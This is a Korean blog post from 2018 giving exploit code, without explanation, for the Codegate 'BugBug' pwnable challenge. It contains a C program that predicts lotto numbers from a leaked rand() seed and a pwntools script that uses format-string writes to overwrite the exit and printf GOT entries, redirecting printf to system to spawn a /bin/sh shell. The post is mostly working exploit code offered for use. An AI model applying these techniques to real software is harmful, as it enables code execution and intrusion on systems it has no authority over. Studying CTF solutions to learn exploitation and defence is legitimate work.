Write-up/Pwnable
[Codegate] BugBug
MyriaBreak
2018. 8. 22. 18:11
아 풀다가 화나서ㅁㄴㅇㄹ... 대체 고놈의 오류때문에;;; 결국 원인은 알아내지못하고 갈아엎고 다시 코드를 짜게 되었다 ㅡㅡ;;;
귀찮아서 설명은 안적겟다 하ㅏㅏㅏㅏ 진짜;;;
그냥 익스코드만 올려놔야지
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | #include <stdio.h> #include <stdlib.h> int main(int argc, char* argv[]) { unsigned int seed; //FILE* urand = fopen("/dev/urandom", "rb"); int i,j; int random[6]={0,0,0,0,0,0}; int next_random; if(argc <2 ) return 0; seed = atoi(argv[1]); //fread(&seed, 4, 1, urand); srand(seed); for(i=0; i<6; i++) { next_random = rand()%45+1; for(j=0; j<i; j++) { if(random[j]==next_random){ next_random = rand()%45+1; j=0; } } random[i]=next_random; } for(i=0; i<6; i++) printf("%d ",random[i]); printf("\n"); return 0; } | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | from pwn import * from subprocess import Popen, PIPE conn = process("./BugBug") def get_lottonum(seed): command = "./rand "+str(seed) popen = Popen(command, shell=True, stdout=PIPE) output, error = popen.communicate() return output exit_got = 0x804A024 printf_got = 0x804A010 main_addr = 0x804882E # exit_got -> main_addr payload = "%"+str(main_addr&0xFFFF)+"x" payload += "%21$hn" payload += "A"*(16-len(payload)) payload += p32(exit_got) payload += "BASE%4$x" payload += "B"*(100-len(payload)) conn.recvuntil("Who are you?") conn.sendline(payload) conn.recvuntil("Hello~ ") conn.recv(100) ## leak Lotto SEED seed = u32(conn.recv(4)) lotto_num = get_lottonum(seed) ## leak and FSB log.info(lotto_num) conn.recvuntil("==> ") conn.sendline(lotto_num) ## leak BASE_addr conn.recvuntil("BASE") base_addr = int(conn.recvuntil("BB")[:-2], 16) - 0x1fda74 log.info("base_addr : 0x%x" % base_addr) system_addr = base_addr + 0x3ada0 system_first = (system_addr&0xFFFF) system_next = (system_addr>>16) - (system_addr&0xFFFF) log.info("distance : %d" % (system_next)) payload = "%"+str(system_first)+"x" payload += "%26$hn" payload += "%"+str(system_next)+"x" payload += "%27$hn" payload += "A"*(32-len(payload)) payload += p32(printf_got) payload += p32(printf_got+2) payload += "B"*(100-len(payload)) conn.sendline(payload) conn.sendline(lotto_num) conn.sendline("/bin/sh;") conn.recvuntil("Input your answer@_@") conn.sendline(lotto_num) conn.interactive() | cs |